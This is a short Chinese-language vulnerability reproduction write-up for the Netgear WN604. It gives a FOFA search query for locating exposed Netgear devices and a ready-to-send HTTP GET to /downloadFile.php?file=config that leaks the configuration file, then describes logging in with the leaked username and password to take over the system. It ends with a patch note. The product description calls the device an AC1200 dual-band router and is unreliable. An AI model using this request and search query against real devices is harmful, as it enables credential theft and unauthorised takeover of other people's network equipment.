0x01 产品描述：

        NETGEAR WN604是一款功能强大的双频AC1200无线路由器,非常适合中大型家庭和企业使用。它支持最新的802.11ac无线标准,能提供高达1200Mbps的无线传输速度。路由器具备千兆有线网口和3个100Mbps有线网口,可满足有线和无线设备的接入需求。此外,它还内置了QoS、访问控制、加密等高级安全和管理功能,可以确保网络的稳定性和安全性。凭借NETGEAR Genie app,用户还可以方便地远程管理和监控路由器。

0x02 漏洞描述：

     Netgear的WN604产品存在一个漏洞，该漏洞存在于Web界面的某个未知功能中，影响文件为/downloadFile.php。通过操纵带有输入配置的参数文件，攻击者可以获取敏感信息。该攻击可能远程发起，获取配置文件中用户名密码，从而登录接管系统。

0x03 影响版本：

Netgear wn系列

0x04 搜索语句：

Fofa：title=="Netgear"

0x05 漏洞复现：

通过downloadFile.php获取配置文件数据

GET /downloadFile.php?file=config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

 通过配置文件泄漏的用户名密码进行登录

0x06 修复建议：

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.netgear.com/uk